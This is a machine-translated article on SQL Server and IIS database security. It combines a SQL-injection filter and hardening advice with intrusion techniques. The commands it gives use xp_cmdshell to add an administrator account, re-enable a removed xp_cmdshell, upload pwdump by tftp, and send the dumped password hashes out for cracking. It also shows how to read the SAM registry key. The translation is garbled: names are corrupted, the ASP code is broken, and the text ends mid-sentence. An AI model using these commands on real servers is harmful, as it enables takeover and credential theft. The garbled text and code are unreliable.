From IIS to SQL database security

Author: Refdom

From codered to nimda, a lot of worms have turned all the vulnerabilities that need to be manually exploited into automatically exploited by programs.
Do you still want to manually operate on these IIS vulnerabilities? Let's adjust our focus to see common databases on the server.

Generally, websites are based on databases, especially those that are dynamically displayed using databases such as ASP, PHP, and JSP. Many networks
The website may pay more attention to operating system vulnerabilities, but it always ignores the security of databases and these scripts, and does not pay much attention to them.

Starting from the most common scripting issues, these are all old topics. You can refer to the "database simplification" written by Hectic.
Single intrusion and rogue damage, taking Tian Rongxin as an example, this article gives a very detailed explanation of the SQL script problem. Security Solution for scripts
Can also be achieved through filtering. For more information, see what I wrote previously. For ASP, you can use the following filter function:

Function Filter_ SQL (strData)

Dim strFilter
Dim blnFlag
Dim I

StrFilter = ",;, //, --, @, _, exec, declare" characters to be filtered. You can add them by yourself. "," is a separator.
BlnFlag = Flase filter flag. If a filter is generated, it is true.

Dim arrayFilter
ArrayFilter = Split (strFilter ,",")
For I = 0 To UBound (arrayFilter)
If Instr (strData, arrayFilter (I)> 0 Then
BlnFlag = True
Exit
End If
Next

If blnFlag Then
Response. Redirect "wrong. asp"
When a filtering operation is found, it is directed to a predefined page. Connection requests that are unavailable for normal access are not good at all.
Else
Filter_ SQL = strData
End If

End Function

For ms SQL Server databases, security issues are not limited to scripts. The system of "Microsoft" is very systematic,
WINDOWS-based applications are highly correlated. for SQL Server, database management and system management can basically be performed.
Equivalent. SQL Server's default Administrator Account "sa" password is empty, which creates a security vulnerability for most NT servers.
Xiao Rong's "SQLRCMD" can use the obtained Database Administrator Account to execute system commands.

There are many system stored procedures in SQL Server, some of which are used inside the database, and some are stored by executing the stored procedures.
To call system commands.

System stored procedure: xp_mongoshell

Is to execute the given command string in the way of the operating system command line interpreter.
The specific syntax is: xp_mongoshell {command_string} [, no_output]

By default, xp_mongoshell can only be executed by sysadmin members. However, sysadmin can also grant permissions to other users.
This execution permission. In earlier versions, users who have obtained the xp_cmdshell Execution permission are running in the user account of SQL Server.
Command line. You can configure SQL Server by configuring options so that users who do not have the sa access permission on SQL Server can
Run xp_cmdshell in the SQLExecutiveCmdExec Windows NT account. In SQL Server 7.0, this account is called
SQLAgentCmdExec. For SQL Server2000, you can run commands directly if you have an account that can execute the stored procedure.

For NT and WIN2000, when the user is not a member of the sysadmin group, xp_mongoshell will simulate the use
The proxy account of the SQL Server Agent specified by xp_sqlagent_proxy_account. If the Proxy account cannot be used,
Xp_cmdshell fails. Therefore, even if an account is the db_owner of the master database, the stored procedure cannot be executed.

If we have a database account that can execute xp_mongoshell, such as a sa account with a blank password. So we can execute this
Command:

Exec xp_cmdshell net user refdom 123456/add
Exec xp_cmdshell net localgroup administrators refdom/add

The above two calls Add a user in the system administrator group: refdom

After obtaining the sa Administrator Account of the database, we should be able to fully control the machine. The importance of database security can be seen.

The following stored procedures can be executed on the Public:
Xp_fileexist is used to determine whether a file exists.
Xp_getfiledetails to obtain the file details.
Xp_dirtree, which can expand the directories you need to know and obtain the depth of all directories.
Xp_getnetname to obtain the server name.

There are also stored procedures that can operate the Registry. These are not executable to the Public, and must be executed by the system administrator or authorized:
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumvalues
Xp_regread (executable for Public)
Xp_regremovemultistring
Xp_regwrite


SQL Server Security Configuration

In addition to filling all patches with Microsoft, it is also necessary to enhance database security.
First, you need to enhance the password of an account such as sa, which is similar to the system account usage configuration.
For accounts with the highest permissions such as sa, use a general account that meets your requirements.

Then, we began to kill the extended stored procedures. The first was the xp_mongoshell, and there were a lot of Stored Procedures
Drop. This is generally not required.

Run:
Use master
Sp_dropextendedproc xp_cmdshell

Remove the guest account to prevent unauthorized access.

Remove unnecessary network protocols.

Strengthen the logging of database login, it is best to record all Login Events. You can use the following simple doscommand to view logs:

Findstr/C: "login" d: Microsoft SQL ServerMSSQLLOG *.*

Use the Administrator account to regularly check all accounts and check whether the password is blank or too simple. For example, the following statement:

Use master
Select name, Password from syslogins where password is null

Use the following statement to check the execution right of stored procedures and extended stored procedures for all accounts, and guard against unnecessary execution permission spread:

Use master
Select sysobjects. name
From sysobjects, sysprotects Where sysprotects. uid = 0 AND xtype IN (X, P)
AND sysobjects. id = sysprotects. id

It is very important to strengthen database security. Some database servers are isolated from WEB servers, which is the same as MAIL Server 1.
As shown in the preceding figure, the database log may be rarely viewed, which may become an oversight point of the Administrator. Data, such as DNS and MAIL
Database servers often become the springboard for various intrusions.

The following are some questions and skills about databases:

1. What should I do if I cannot execute the xp_mongoshell stored procedure after obtaining the SA permission?
A: The xp_mongoshell and other extended stored procedures have been deleted. You can use this stored procedure to restore xp_mongoshell.
Sp_addextendedproc xp_cmdshell, xpsql70.dll

2. Use pwdump to obtain the system administrator password.
Upload a pwdump first
Tftp-I GET pwdump3.exe pwdump3.exe
Tftp-I GET lsaext. dll lsaext. dll
Tftp-I GET pwservice.exe
Pwdump3 127.0.0.1 outfile.txt
Tftp PUT outfile.txt
And then use the decryption tool l0pht to crack these passwords.

3. Read the system administrator password from the database.
The encrypted password cannot be read by the "administrator" account of NT, and can be read by SQL Server.
"LocalSystem" account, which is a higher level than administrator. You can use the following stored procedure. But read
The password is encrypted and then decrypted.
Xp_regread HKEY_LOCAL_MACHINE, SECURITYSAMDomainsAccount, F

Of course, there are still many security and defects in the database server, and more research is needed. I am still in the initial stage of learning databases,
Limited to your own level, the above is inevitable. You are welcome to correct and advise. If you have